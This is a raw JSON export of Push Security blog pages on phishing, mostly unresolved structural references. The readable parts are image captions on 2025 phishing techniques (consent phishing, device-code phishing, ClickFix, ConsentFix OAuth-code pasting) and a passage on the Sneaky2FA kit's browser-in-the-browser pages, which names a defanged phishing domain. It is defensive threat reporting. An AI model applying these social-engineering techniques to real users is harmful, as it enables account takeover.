sys":48679},{"id":39704,"type":317,"linkType":318},[],{"nodeType":312,"data":48682,"content":48685},{"target":48683},{"sys":48684},{"id":39710,"type":317,"linkType":318},[],{"nodeType":178,"data":48687,"content":48688},{},[48689],{"nodeType":173,"value":39716,"marks":48690,"data":48691},[],{},{"nodeType":178,"data":48693,"content":48694},{},[48695],{"nodeType":173,"value":39723,"marks":48696,"data":48697},[],{},{"nodeType":178,"data":48699,"content":48700},{},[48701,48704,48711],{"nodeType":173,"value":39730,"marks":48702,"data":48703},[],{},{"nodeType":186,"data":48705,"content":48706},{"uri":39735},[48707],{"nodeType":173,"value":6811,"marks":48708,"data":48710},[48709],{"type":194},{},{"nodeType":173,"value":39742,"marks":48712,"data":48713},[],{},{"nodeType":231,"data":48715,"content":48716},{},[],{"nodeType":169,"data":48718,"content":48719},{},[48720],{"nodeType":173,"value":39752,"marks":48721,"data":48723},[48722],{"type":370},{},{"nodeType":178,"data":48725,"content":48726},{},[48727],{"nodeType":173,"value":39760,"marks":48728,"data":48729},[],{},{"nodeType":178,"data":48731,"content":48732},{},[48733],{"nodeType":173,"value":39767,"marks":48734,"data":48735},[],{},{"nodeType":178,"data":48737,"content":48738},{},[48739],{"nodeType":173,"value":39774,"marks":48740,"data":48741},[],{},{"nodeType":178,"data":48743,"content":48744},{},[48745,48748,48755,48758,48765,48768,48775],{"nodeType":173,"value":39781,"marks":48746,"data":48747},[],{},{"nodeType":186,"data":48749,"content":48750},{"uri":39786},[48751],{"nodeType":173,"value":39789,"marks":48752,"data":48754},[48753],{"type":194},{},{"nodeType":173,"value":9534,"marks":48756,"data":48757},[],{},{"nodeType":186,"data":48759,"content":48760},{"uri":6820},[48761],{"nodeType":173,"value":8157,"marks":48762,"data":48764},[48763],{"type":194},{},{"nodeType":173,"value":39804,"marks":48766,"data":48767},[],{},{"nodeType":186,"data":48769,"content":48770},{"uri":39809},[48771],{"nodeType":173,"value":39812,"marks":48772,"data":48774},[48773],{"type":194},{},{"nodeType":173,"value":39817,"marks":48776,"data":48777},[],{},{"nodeType":178,"data":48779,"content":48780},{},[48781],{"nodeType":173,"value":39824,"marks":48782,"data":48783},[],{},{"nodeType":250,"data":48785,"content":48786},{},[48787,48796,48805],{"nodeType":254,"data":48788,"content":48789},{},[48790],{"nodeType":178,"data":48791,"content":48792},{},[48793],{"nodeType":173,"value":39837,"marks":48794,"data":48795},[],{},{"nodeType":254,"data":48797,"content":48798},{},[48799],{"nodeType":178,"data":48800,"content":48801},{},[48802],{"nodeType":173,"value":39847,"marks":48803,"data":48804},[],{},{"nodeType":254,"data":48806,"content":48807},{},[48808],{"nodeType":178,"data":48809,"content":48810},{},[48811,48814,48821],{"nodeType":173,"value":39857,"marks":48812,"data":48813},[],{},{"nodeType":186,"data":48815,"content":48816},{"uri":7853},[48817],{"nodeType":173,"value":39864,"marks":48818,"data":48820},[48819],{"type":194},{},{"nodeType":173,"value":39869,"marks":48822,"data":48823},[],{},{"nodeType":312,"data":48825,"content":48828},{"target":48826},{"sys":48827},{"id":39876,"type":317,"linkType":318},[],{"nodeType":178,"data":48830,"content":48831},{},[48832],{"nodeType":173,"value":39882,"marks":48833,"data":48834},[],{},{"nodeType":178,"data":48836,"content":48837},{},[48838],{"nodeType":173,"value":39889,"marks":48839,"data":48840},[],{},{"nodeType":231,"data":48842,"content":48843},{},[],{"nodeType":169,"data":48845,"content":48846},{},[48847],{"nodeType":173,"value":39899,"marks":48848,"data":48850},[48849],{"type":370},{},{"nodeType":178,"data":48852,"content":48853},{},[48854],{"nodeType":173,"value":39907,"marks":48855,"data":48856},[],{},{"nodeType":178,"data":48858,"content":48859},{},[48860],{"nodeType":173,"value":39914,"marks":48861,"data":48862},[],{},{"nodeType":178,"data":48864,"content":48865},{},[48866],{"nodeType":173,"value":39921,"marks":48867,"data":48868},[],{},{"nodeType":250,"data":48870,"content":48871},{},[48872,48896,48920],{"nodeType":254,"data":48873,"content":48874},{},[48875],{"nodeType":178,"data":48876,"content":48877},{},[48878,48881,48889,48893],{"nodeType":173,"value":37,"marks":48879,"data":48880},[],{},{"nodeType":186,"data":48882,"content":48883},{"uri":19838},[48884],{"nodeType":173,"value":39940,"marks":48885,"data":48888},[48886,48887],{"type":194},{"type":370},{},{"nodeType":173,"value":39946,"marks":48890,"data":48892},[48891],{"type":370},{},{"nodeType":173,"value":39951,"marks":48894,"data":48895},[],{},{"nodeType":254,"data":48897,"content":48898},{},[48899],{"nodeType":178,"data":48900,"content":48901},{},[48902,48905,48913,48917],{"nodeType":173,"value":37,"marks":48903,"data":48904},[],{},{"nodeType":186,"data":48906,"content":48907},{"uri":9275},[48908],{"nodeType":173,"value":9278,"marks":48909,"data":48912},[48910,48911],{"type":194},{"type":370},{},{"nodeType":173,"value":39972,"marks":48914,"data":48916},[48915],{"type":370},{},{"nodeType":173,"value":39977,"marks":48918,"data":48919},[],{},{"nodeType":254,"data":48921,"content":48922},{},[48923],{"nodeType":178,"data":48924,"content":48925},{},[48926,48930],{"nodeType":173,"value":39987,"marks":48927,"data":48929},[48928],{"type":370},{},{"nodeType":173,"value":39992,"marks":48931,"data":48932},[],{},{"nodeType":312,"data":48934,"content":48937},{"target":48935},{"sys":48936},{"id":39999,"type":317,"linkType":318},[],{"nodeType":312,"data":48939,"content":48942},{"target":48940},{"sys":48941},{"id":40005,"type":317,"linkType":318},[],{"nodeType":178,"data":48944,"content":48945},{},[48946,48949,48956,48959,48966],{"nodeType":173,"value":40011,"marks":48947,"data":48948},[],{},{"nodeType":186,"data":48950,"content":48951},{"uri":40016},[48952],{"nodeType":173,"value":1845,"marks":48953,"data":48955},[48954],{"type":194},{},{"nodeType":173,"value":40023,"marks":48957,"data":48958},[],{},{"nodeType":186,"data":48960,"content":48961},{"uri":40028},[48962],{"nodeType":173,"value":40031,"marks":48963,"data":48965},[48964],{"type":194},{},{"nodeType":173,"value":40036,"marks":48967,"data":48968},[],{},{"nodeType":312,"data":48970,"content":48973},{"target":48971},{"sys":48972},{"id":40043,"type":317,"linkType":318},[],{"nodeType":178,"data":48975,"content":48976},{},[48977,48980,48987],{"nodeType":173,"value":40049,"marks":48978,"data":48979},[],{},{"nodeType":186,"data":48981,"content":48982},{"uri":40054},[48983],{"nodeType":173,"value":1857,"marks":48984,"data":48986},[48985],{"type":194},{},{"nodeType":173,"value":40061,"marks":48988,"data":48989},[],{},{"nodeType":312,"data":48991,"content":48994},{"target":48992},{"sys":48993},{"id":40068,"type":317,"linkType":318},[],{"nodeType":178,"data":48996,"content":48997},{},[48998],{"nodeType":173,"value":40074,"marks":48999,"data":49000},[],{},{"nodeType":178,"data":49002,"content":49003},{},[49004],{"nodeType":173,"value":40081,"marks":49005,"data":49006},[],{},{"nodeType":312,"data":49008,"content":49011},{"target":49009},{"sys":49010},{"id":40088,"type":317,"linkType":318},[],{"nodeType":231,"data":49013,"content":49014},{},[],{"nodeType":169,"data":49016,"content":49017},{},[49018],{"nodeType":173,"value":40097,"marks":49019,"data":49021},[49020],{"type":370},{},{"nodeType":178,"data":49023,"content":49024},{},[49025],{"nodeType":173,"value":40105,"marks":49026,"data":49027},[],{},{"nodeType":250,"data":49029,"content":49030},{},[49031,49040,49049],{"nodeType":254,"data":49032,"content":49033},{},[49034],{"nodeType":178,"data":49035,"content":49036},{},[49037],{"nodeType":173,"value":40118,"marks":49038,"data":49039},[],{},{"nodeType":254,"data":49041,"content":49042},{},[49043],{"nodeType":178,"data":49044,"content":49045},{},[49046],{"nodeType":173,"value":40128,"marks":49047,"data":49048},[],{},{"nodeType":254,"data":49050,"content":49051},{},[49052],{"nodeType":178,"data":49053,"content":49054},{},[49055],{"nodeType":173,"value":40138,"marks":49056,"data":49057},[],{},{"nodeType":178,"data":49059,"content":49060},{},[49061],{"nodeType":173,"value":40145,"marks":49062,"data":49063},[],{},{"nodeType":231,"data":49065,"content":49066},{},[],{"nodeType":169,"data":49068,"content":49069},{},[49070],{"nodeType":173,"value":40155,"marks":49071,"data":49073},[49072],{"type":370},{},{"nodeType":178,"data":49075,"content":49076},{},[49077],{"nodeType":173,"value":40163,"marks":49078,"data":49079},[],{},{"nodeType":178,"data":49081,"content":49082},{},[49083],{"nodeType":173,"value":40170,"marks":49084,"data":49085},[],{},{"nodeType":178,"data":49087,"content":49088},{},[49089,49092,49099,49102,49109],{"nodeType":173,"value":1451,"marks":49090,"data":49091},[],{},{"nodeType":186,"data":49093,"content":49094},{"uri":1456},[49095],{"nodeType":173,"value":1459,"marks":49096,"data":49098},[49097],{"type":194},{},{"nodeType":173,"value":1464,"marks":49100,"data":49101},[],{},{"nodeType":186,"data":49103,"content":49104},{"uri":1469},[49105],{"nodeType":173,"value":1472,"marks":49106,"data":49108},[49107],{"type":194},{},{"nodeType":173,"value":1477,"marks":49110,"data":49111},[],{},{"nodeType":312,"data":49113,"content":49116},{"target":49114},{"sys":49115},{"id":8590,"type":317,"linkType":318},[],{"nodeType":178,"data":49118,"content":49119},{},[49120],{"nodeType":173,"value":37,"marks":49121,"data":49122},[],{},{"entries":49124},{"hyperlink":49125,"inline":49126,"block":49127},[],[],[49128,49153,49158,49164,49169,49175,49180,49187,49193,49200,49206],{"sys":49129,"__typename":5311,"content":49130,"name":49152,"title":118},{"id":39552},{"json":49131},{"nodeType":165,"data":49132,"content":49133},{},[49134],{"nodeType":178,"data":49135,"content":49136},{},[49137,49141,49149],{"nodeType":173,"value":49138,"marks":49139,"data":49140},"We recently ran a webinar packed full of attack demo's, showcasing some of the most interesting attacks intercepted by Push in 2025. ",[],{},{"nodeType":186,"data":49142,"content":49144},{"uri":49143},"https://pushsecurity.com/webinar/phishing-2025-review",[49145],{"nodeType":173,"value":49146,"marks":49147,"data":49148},"You can now watch it on demand here!",[],{},{"nodeType":173,"value":37,"marks":49150,"data":49151},[],{},"Top phishing trends insight box 1",{"sys":49154,"__typename":5345,"title":49155,"caption":49155,"layoutMode":118,"file":49156},{"id":39698},"Fake private equity fund page hosted on Google Sites. ",{"url":49157,"width":5358,"height":11942},"https://images.ctfassets.net/y1cdw1ablpvd/2DbF1Lj4h5HVGrqDhlVlTF/9efa11f318206eb913d83c254746efb1/1.png",{"sys":49159,"__typename":5345,"title":49160,"caption":49160,"layoutMode":118,"file":49161},{"id":39704},"Custom investment fund landing page hosted on Firebase.",{"url":49162,"width":5358,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/2NH9muR2eBEPEybqQ8o0yu/ef66b40c7428790c9017181e17b33558/2.png",1080,{"sys":49165,"__typename":5345,"title":49166,"caption":49166,"layoutMode":118,"file":49167},{"id":39710},"Malvertising link for “Google Ads” taking the top Sponsored Results spot.",{"url":49168,"width":5358,"height":42838},"https://images.ctfassets.net/y1cdw1ablpvd/2gQcwHSyUKIoqlW1upRSzK/5ead4c9e6c1e6659be7d781ad85ed9ea/3.png",{"sys":49170,"__typename":5345,"title":49171,"caption":49171,"layoutMode":118,"file":49172},{"id":39876},"Example of a typical phishing link chain incorporating legitimate websites before serving up a phishing page, as shown in the Push Security “Timelines” detection feature.",{"url":49173,"width":49174,"height":5358},"https://images.ctfassets.net/y1cdw1ablpvd/3WZkEAVsAH7PWtcoQJfDG1/03826279b5dd2bc11fbbf34f82c59136/4.png",1743,{"sys":49176,"__typename":5345,"title":49177,"caption":49177,"layoutMode":118,"file":49178},{"id":39999},"Consent phishing examples where an attacker tricks the victim into authorizing an attacker-controlled app with risky permissions.",{"url":49179,"width":5358,"height":12098},"https://images.ctfassets.net/y1cdw1ablpvd/2ZgY3mMKcE6IGpH55kOuL4/2a7e78e97654faa61cf8e8b002789b96/5.png",{"sys":49181,"__typename":5345,"title":49182,"caption":49182,"layoutMode":118,"file":49183},{"id":40005},"Device code phishing targeting Salesforce, as seen in the Scattered Lapsus$ Hunters campaign. ",{"url":49184,"width":49185,"height":49186},"https://images.ctfassets.net/y1cdw1ablpvd/7uvYjRiqG4E7qj3PTmTZzW/3d3ed52d3157bf12a630e35eb2ae08d1/6.png",1488,950,{"sys":49188,"__typename":5345,"title":49189,"caption":49189,"layoutMode":118,"file":49190},{"id":40043},"ClickFix attacks prompt the victim to “fix” an issue on the webpage by running code locally on their machine.",{"url":49191,"width":5358,"height":49192},"https://images.ctfassets.net/y1cdw1ablpvd/1LXv96rhy5Sv6SBlJP0bJS/6fb6b49dcd2bdc003c2aa60ed271708f/7.png",1117,{"sys":49194,"__typename":5345,"title":49195,"caption":49195,"layoutMode":118,"file":49196},{"id":40068},"ConsentFix prompts victims to paste a URL containing an OAuth code, authorising a connection to the attacker’s OAuth app tenant. ",{"url":49197,"width":49198,"height":49199},"https://images.ctfassets.net/y1cdw1ablpvd/7IfG43sz0jRnrNiKsMwN8j/1373b7cd86fe969acad27ad956612ca0/8.png",1225,1135,{"sys":49201,"__typename":5345,"title":49202,"caption":49202,"layoutMode":118,"file":49203},{"id":40088},"There are lots of ways that attackers can achieve account takeover today via phishing / social engineering.",{"url":49204,"width":5358,"height":49205},"https://images.ctfassets.net/y1cdw1ablpvd/4Wz7gAJLWDyaGjj030ypH2/7a07f1e5c46cdebd2e395d0ceb412387/9.png",969,{"sys":49207,"__typename":15269,"type":15270,"ctaText":49208,"buttonLabel":15277,"buttonColour":15273,"buttonUrl":49143},{"id":8590},"Learn how phishing evolved in 2025, showcasing the most sophisticated attacks and key trends uncovered by Push researchers","content:blog:2025-top-phishing-trends.json","blog/2025-top-phishing-trends.json","blog/2025-top-phishing-trends",{"_path":49213,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":49214,"ogImage":118,"summary":49216,"title":8598,"subtitle":118,"metaTitle":49227,"synopsis":8599,"hashTags":118,"publishedDate":8600,"slug":8601,"tagsCollection":49228,"relatedBlogPostsCollection":49234,"authorsCollection":50822,"content":50826,"_id":51717,"_type":5439,"_source":5440,"_file":51718,"_stem":51719,"_extension":5439},"/blog/consentfix",{"id":7748,"publishedAt":49215},"2026-02-04T09:53:45.482Z",{"json":49217},{"data":49218,"content":49219,"nodeType":165},{},[49220],{"data":49221,"content":49222,"nodeType":178},{},[49223],{"data":49224,"marks":49225,"value":49226,"nodeType":173},{},[],"We recently intercepted a phishing campaign using a new kind of attack technique that we’re calling “ConsentFix” — combining OAuth consent phishing with a ClickFix-style user prompt that leads to account compromise. Here's what you need to know.","ConsentFix: Browser-native ClickFix hijacks OAuth grants",{"items":49229},[49230,49232],{"sys":49231,"name":505},{"id":504},{"sys":49233,"name":509},{"id":508},{"items":49235},[49236,49756,50313],{"__typename":1528,"sys":49237,"content":49238,"title":42282,"synopsis":42283,"hashTags":118,"publishedDate":41691,"slug":42284,"tagsCollection":49746,"authorsCollection":49752},{"id":41705},{"json":49239},{"data":49240,"content":49241,"nodeType":165},{},[49242,49248,49254,49260,49265,49271,49274,49281,49287,49293,49299,49304,49310,49315,49321,49326,49332,49337,49363,49369,49374,49380,49385,49391,49396,49402,49441,49444,49451,49457,49463,49469,49474,49477,49484,49490,49506,49511,49516,49521,49527,49532,49537,49553,49556,49563,49579,49584,49590,49606,49613,49619,49625,49631,49647,49654,49660,49665,49668,49675,49681,49687,49690,49697,49703,49709,49735,49740],{"data":49243,"content":49244,"nodeType":178},{},[49245],{"data":49246,"marks":49247,"value":41716,"nodeType":173},{},[],{"data":49249,"content":49250,"nodeType":178},{},[49251],{"data":49252,"marks":49253,"value":41723,"nodeType":173},{},[],{"data":49255,"content":49256,"nodeType":178},{},[49257],{"data":49258,"marks":49259,"value":41730,"nodeType":173},{},[],{"data":49261,"content":49264,"nodeType":312},{"target":49262},{"sys":49263},{"id":41735,"type":317,"linkType":318},[],{"data":49266,"content":49267,"nodeType":178},{},[49268],{"data":49269,"marks":49270,"value":41743,"nodeType":173},{},[],{"data":49272,"content":49273,"nodeType":231},{},[],{"data":49275,"content":49276,"nodeType":169},{},[49277],{"data":49278,"marks":49279,"value":41754,"nodeType":173},{},[49280],{"type":370},{"data":49282,"content":49283,"nodeType":178},{},[49284],{"data":49285,"marks":49286,"value":41761,"nodeType":173},{},[],{"data":49288,"content":49289,"nodeType":178},{},[49290],{"data":49291,"marks":49292,"value":41768,"nodeType":173},{},[],{"data":49294,"content":49295,"nodeType":178},{},[49296],{"data":49297,"marks":49298,"value":41775,"nodeType":173},{},[],{"data":49300,"content":49303,"nodeType":312},{"target":49301},{"sys":49302},{"id":41780,"type":317,"linkType":318},[],{"data":49305,"content":49306,"nodeType":178},{},[49307],{"data":49308,"marks":49309,"value":41788,"nodeType":173},{},[],{"data":49311,"content":49314,"nodeType":312},{"target":49312},{"sys":49313},{"id":41793,"type":317,"linkType":318},[],{"data":49316,"content":49317,"nodeType":178},{},[49318],{"data":49319,"marks":49320,"value":41801,"nodeType":173},{},[],{"data":49322,"content":49325,"nodeType":312},{"target":49323},{"sys":49324},{"id":41806,"type":317,"linkType":318},[],{"data":49327,"content":49328,"nodeType":178},{},[49329],{"data":49330,"marks":49331,"value":41814,"nodeType":173},{},[],{"data":49333,"content":49336,"nodeType":312},{"target":49334},{"sys":49335},{"id":41819,"type":317,"linkType":318},[],{"data":49338,"content":49339,"nodeType":178},{},[49340,49343,49350,49353,49360],{"data":49341,"marks":49342,"value":41827,"nodeType":173},{},[],{"data":49344,"content":49345,"nodeType":186},{"uri":7853},[49346],{"data":49347,"marks":49348,"value":41835,"nodeType":173},{},[49349],{"type":194},{"data":49351,"marks":49352,"value":41839,"nodeType":173},{},[],{"data":49354,"content":49355,"nodeType":186},{"uri":6820},[49356],{"data":49357,"marks":49358,"value":13298,"nodeType":173},{},[49359],{"type":194},{"data":49361,"marks":49362,"value":41850,"nodeType":173},{},[],{"data":49364,"content":49365,"nodeType":178},{},[49366],{"data":49367,"marks":49368,"value":41857,"nodeType":173},{},[],{"data":49370,"content":49373,"nodeType":312},{"target":49371},{"sys":49372},{"id":41862,"type":317,"linkType":318},[],{"data":49375,"content":49376,"nodeType":178},{},[49377],{"data":49378,"marks":49379,"value":41870,"nodeType":173},{},[],{"data":49381,"content":49384,"nodeType":312},{"target":49382},{"sys":49383},{"id":41875,"type":317,"linkType":318},[],{"data":49386,"content":49387,"nodeType":178},{},[49388],{"data":49389,"marks":49390,"value":41883,"nodeType":173},{},[],{"data":49392,"content":49395,"nodeType":312},{"target":49393},{"sys":49394},{"id":41888,"type":317,"linkType":318},[],{"data":49397,"content":49398,"nodeType":178},{},[49399],{"data":49400,"marks":49401,"value":41896,"nodeType":173},{},[],{"data":49403,"content":49404,"nodeType":250},{},[49405,49414,49423,49432],{"data":49406,"content":49407,"nodeType":254},{},[49408],{"data":49409,"content":49410,"nodeType":178},{},[49411],{"data":49412,"marks":49413,"value":41909,"nodeType":173},{},[],{"data":49415,"content":49416,"nodeType":254},{},[49417],{"data":49418,"content":49419,"nodeType":178},{},[49420],{"data":49421,"marks":49422,"value":41919,"nodeType":173},{},[],{"data":49424,"content":49425,"nodeType":254},{},[49426],{"data":49427,"content":49428,"nodeType":178},{},[49429],{"data":49430,"marks":49431,"value":41929,"nodeType":173},{},[],{"data":49433,"content":49434,"nodeType":254},{},[49435],{"data":49436,"content":49437,"nodeType":178},{},[49438],{"data":49439,"marks":49440,"value":41939,"nodeType":173},{},[],{"data":49442,"content":49443,"nodeType":231},{},[],{"data":49445,"content":49446,"nodeType":169},{},[49447],{"data":49448,"marks":49449,"value":41950,"nodeType":173},{},[49450],{"type":370},{"data":49452,"content":49453,"nodeType":178},{},[49454],{"data":49455,"marks":49456,"value":41957,"nodeType":173},{},[],{"data":49458,"content":49459,"nodeType":178},{},[49460],{"data":49461,"marks":49462,"value":41964,"nodeType":173},{},[],{"data":49464,"content":49465,"nodeType":178},{},[49466],{"data":49467,"marks":49468,"value":41971,"nodeType":173},{},[],{"data":49470,"content":49473,"nodeType":312},{"target":49471},{"sys":49472},{"id":41976,"type":317,"linkType":318},[],{"data":49475,"content":49476,"nodeType":231},{},[],{"data":49478,"content":49479,"nodeType":169},{},[49480],{"data":49481,"marks":49482,"value":41988,"nodeType":173},{},[49483],{"type":370},{"data":49485,"content":49486,"nodeType":178},{},[49487],{"data":49488,"marks":49489,"value":41995,"nodeType":173},{},[],{"data":49491,"content":49492,"nodeType":178},{},[49493,49496,49503],{"data":49494,"marks":49495,"value":42002,"nodeType":173},{},[],{"data":49497,"content":49498,"nodeType":186},{"uri":42005},[49499],{"data":49500,"marks":49501,"value":42011,"nodeType":173},{},[49502],{"type":194},{"data":49504,"marks":49505,"value":42015,"nodeType":173},{},[],{"data":49507,"content":49510,"nodeType":312},{"target":49508},{"sys":49509},{"id":42020,"type":317,"linkType":318},[],{"data":49512,"content":49515,"nodeType":312},{"target":49513},{"sys":49514},{"id":42026,"type":317,"linkType":318},[],{"data":49517,"content":49520,"nodeType":312},{"target":49518},{"sys":49519},{"id":42032,"type":317,"linkType":318},[],{"data":49522,"content":49523,"nodeType":178},{},[49524],{"data":49525,"marks":49526,"value":42040,"nodeType":173},{},[],{"data":49528,"content":49531,"nodeType":312},{"target":49529},{"sys":49530},{"id":42045,"type":317,"linkType":318},[],{"data":49533,"content":49536,"nodeType":312},{"target":49534},{"sys":49535},{"id":42051,"type":317,"linkType":318},[],{"data":49538,"content":49539,"nodeType":178},{},[49540,49543,49550],{"data":49541,"marks":49542,"value":42059,"nodeType":173},{},[],{"data":49544,"content":49545,"nodeType":186},{"uri":42062},[49546],{"data":49547,"marks":49548,"value":42068,"nodeType":173},{},[49549],{"type":194},{"data":49551,"marks":49552,"value":42072,"nodeType":173},{},[],{"data":49554,"content":49555,"nodeType":231},{},[],{"data":49557,"content":49558,"nodeType":169},{},[49559],{"data":49560,"marks":49561,"value":42083,"nodeType":173},{},[49562],{"type":370},{"data":49564,"content":49565,"nodeType":178},{},[49566,49569,49576],{"data":49567,"marks":49568,"value":42090,"nodeType":173},{},[],{"data":49570,"content":49571,"nodeType":186},{"uri":42093},[49572],{"data":49573,"marks":49574,"value":8157,"nodeType":173},{},[49575],{"type":194},{"data":49577,"marks":49578,"value":42102,"nodeType":173},{},[],{"data":49580,"content":49583,"nodeType":312},{"target":49581},{"sys":49582},{"id":42107,"type":317,"linkType":318},[],{"data":49585,"content":49586,"nodeType":178},{},[49587],{"data":49588,"marks":49589,"value":42115,"nodeType":173},{},[],{"data":49591,"content":49592,"nodeType":178},{},[49593,49596,49603],{"data":49594,"marks":49595,"value":41484,"nodeType":173},{},[],{"data":49597,"content":49598,"nodeType":186},{"uri":1842},[49599],{"data":49600,"marks":49601,"value":1845,"nodeType":173},{},[49602],{"type":194},{"data":49604,"marks":49605,"value":41495,"nodeType":173},{},[],{"data":49607,"content":49608,"nodeType":235},{},[49609],{"data":49610,"marks":49611,"value":42139,"nodeType":173},{},[49612],{"type":370},{"data":49614,"content":49615,"nodeType":178},{},[49616],{"data":49617,"marks":49618,"value":42146,"nodeType":173},{},[],{"data":49620,"content":49621,"nodeType":178},{},[49622],{"data":49623,"marks":49624,"value":42153,"nodeType":173},{},[],{"data":49626,"content":49627,"nodeType":178},{},[49628],{"data":49629,"marks":49630,"value":41463,"nodeType":173},{},[],{"data":49632,"content":49633,"nodeType":178},{},[49634,49637,49644],{"data":49635,"marks":49636,"value":42166,"nodeType":173},{},[],{"data":49638,"content":49639,"nodeType":186},{"uri":5002},[49640],{"data":49641,"marks":49642,"value":6811,"nodeType":173},{},[49643],{"type":194},{"data":49645,"marks":49646,"value":42177,"nodeType":173},{},[],{"data":49648,"content":49649,"nodeType":235},{},[49650],{"data":49651,"marks":49652,"value":42185,"nodeType":173},{},[49653],{"type":370},{"data":49655,"content":49656,"nodeType":178},{},[49657],{"data":49658,"marks":49659,"value":42192,"nodeType":173},{},[],{"data":49661,"content":49664,"nodeType":312},{"target":49662},{"sys":49663},{"id":42197,"type":317,"linkType":318},[],{"data":49666,"content":49667,"nodeType":231},{},[],{"data":49669,"content":49670,"nodeType":169},{},[49671],{"data":49672,"marks":49673,"value":8406,"nodeType":173},{},[49674],{"type":370},{"data":49676,"content":49677,"nodeType":178},{},[49678],{"data":49679,"marks":49680,"value":42215,"nodeType":173},{},[],{"data":49682,"content":49683,"nodeType":178},{},[49684],{"data":49685,"marks":49686,"value":41621,"nodeType":173},{},[],{"data":49688,"content":49689,"nodeType":231},{},[],{"data":49691,"content":49692,"nodeType":169},{},[49693],{"data":49694,"marks":49695,"value":2824,"nodeType":173},{},[49696],{"type":370},{"data":49698,"content":49699,"nodeType":178},{},[49700],{"data":49701,"marks":49702,"value":42238,"nodeType":173},{},[],{"data":49704,"content":49705,"nodeType":178},{},[49706],{"data":49707,"marks":49708,"value":1444,"nodeType":173},{},[],{"data":49710,"content":49711,"nodeType":178},{},[49712,49715,49722,49725,49732],{"data":49713,"marks":49714,"value":1451,"nodeType":173},{},[],{"data":49716,"content":49717,"nodeType":186},{"uri":1456},[49718],{"data":49719,"marks":49720,"value":1459,"nodeType":173},{},[49721],{"type":194},{"data":49723,"marks":49724,"value":1464,"nodeType":173},{},[],{"data":49726,"content":49727,"nodeType":186},{"uri":1469},[49728],{"data":49729,"marks":49730,"value":1472,"nodeType":173},{},[49731],{"type":194},{"data":49733,"marks":49734,"value":1477,"nodeType":173},{},[],{"data":49736,"content":49739,"nodeType":312},{"target":49737},{"sys":49738},{"id":8590,"type":317,"linkType":318},[],{"data":49741,"content":49742,"nodeType":178},{},[49743],{"data":49744,"marks":49745,"value":37,"nodeType":173},{},[],{"items":49747},[49748,49750],{"sys":49749,"name":505},{"id":504},{"sys":49751,"name":509},{"id":508},{"items":49753},[49754],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":49755},{"url":8615},{"__typename":1528,"sys":49757,"content":49758,"title":46292,"synopsis":50301,"hashTags":118,"publishedDate":50302,"slug":46293,"tagsCollection":50303,"authorsCollection":50309},{"id":24196},{"json":49759},{"nodeType":165,"data":49760,"content":49761},{},[49762,49769,49775,49803,49810,49817,49824,49827,49835,49855,49862,49868,49875,49881,49888,49894,49901,49907,49914,49920,49927,49934,49940,49943,49951,49971,49978,49985,49991,50009,50017,50037,50045,50063,50070,50076,50108,50116,50149,50157,50177,50182,50185,50193,50213,50219,50222,50229,50236,50243,50246,50253,50259,50266,50290,50295],{"nodeType":178,"data":49763,"content":49764},{},[49765],{"nodeType":173,"value":49766,"marks":49767,"data":49768},"PhaaS kits make up the vast majority of phishing sites intercepted by Push and dominate the phishing landscape, with kits like Tycoon, NakedPages, Flowerstorm, Salty2FA, and various Evilginx variations proving very popular among attackers targeting Push customers.",[],{},{"nodeType":178,"data":49770,"content":49771},{},[49772],{"nodeType":173,"value":39774,"marks":49773,"data":49774},[],{},{"nodeType":178,"data":49776,"content":49777},{},[49778,49781,49789,49792,49799],{"nodeType":173,"value":39781,"marks":49779,"data":49780},[],{},{"nodeType":186,"data":49782,"content":49784},{"uri":49783},"https://pushsecurity.com/blog/mfa-downgrade-attacks/",[49785],{"nodeType":173,"value":39789,"marks":49786,"data":49788},[49787],{"type":194},{},{"nodeType":173,"value":9534,"marks":49790,"data":49791},[],{},{"nodeType":186,"data":49793,"content":49794},{"uri":6820},[49795],{"nodeType":173,"value":8157,"marks":49796,"data":49798},[49797],{"type":194},{},{"nodeType":173,"value":49800,"marks":49801,"data":49802}," are being used to circumvent security tools — from email scanners, to web-crawling security tools, to web proxies analyzing network traffic.",[],{},{"nodeType":178,"data":49804,"content":49805},{},[49806],{"nodeType":173,"value":49807,"marks":49808,"data":49809},"Recently, we’ve noticed an increase in detections relating to Sneaky2FA, which operates through a fully-featured bot on Telegram. Customers reportedly receive access to a licensed, obfuscated version of the source code and deploy it independently.",[],{},{"nodeType":178,"data":49811,"content":49812},{},[49813],{"nodeType":173,"value":49814,"marks":49815,"data":49816},"This makes Sneaky2FA something that can be reliably profiled and tracked due to these codebase similarities — which is what we’re actively doing at Push. ",[],{},{"nodeType":178,"data":49818,"content":49819},{},[49820],{"nodeType":173,"value":49821,"marks":49822,"data":49823},"Why is this relevant? Well, the latest Sneaky2FA phish we identified was pretty interesting. ",[],{},{"nodeType":231,"data":49825,"content":49826},{},[],{"nodeType":169,"data":49828,"content":49829},{},[49830],{"nodeType":173,"value":49831,"marks":49832,"data":49834},"Sneaky2FA adds BITB to its phishing toolkit",[49833],{"type":370},{},{"nodeType":178,"data":49836,"content":49837},{},[49838,49842,49851],{"nodeType":173,"value":49839,"marks":49840,"data":49841},"We recently detected a Sneaky2FA server that is a bit different from the typical reverse-proxy ",[],{},{"nodeType":186,"data":49843,"content":49845},{"uri":49844},"https://pushsecurity.com/blog/phishing-2-0-how-phishing-toolkits-are-evolving-with-aitm/",[49846],{"nodeType":173,"value":49847,"marks":49848,"data":49850},"Attacker-in-the-Middle",[49849],{"type":194},{},{"nodeType":173,"value":49852,"marks":49853,"data":49854}," site, featuring an embedded browser window that contained the actual phishing page. ",[],{},{"nodeType":178,"data":49856,"content":49857},{},[49858],{"nodeType":173,"value":49859,"marks":49860,"data":49861},"You can see how the page loaded below in the video below.",[],{},{"nodeType":312,"data":49863,"content":49867},{"target":49864},{"sys":49865},{"id":49866,"type":317,"linkType":318},"6L6Ban2xptI1uNA8OPJQzq",[],{"nodeType":178,"data":49869,"content":49870},{},[49871],{"nodeType":173,"value":49872,"marks":49873,"data":49874},"When the URL previewdoc[.]us is first accessed, a Cloudflare Turnstile check must be completed before the page loads. ",[],{},{"nodeType":312,"data":49876,"content":49880},{"target":49877},{"sys":49878},{"id":49879,"type":317,"linkType":318},"QscI1SZ6dOpgMkrJPtqLD",[],{"nodeType":178,"data":49882,"content":49883},{},[49884],{"nodeType":173,"value":49885,"marks":49886,"data":49887},"The page then redirects to a subdomain of previewdoc[.]us, which prompts the user to “Sign in with Microsoft” in order to view a document, styled to look like Adobe Acrobat Reader. 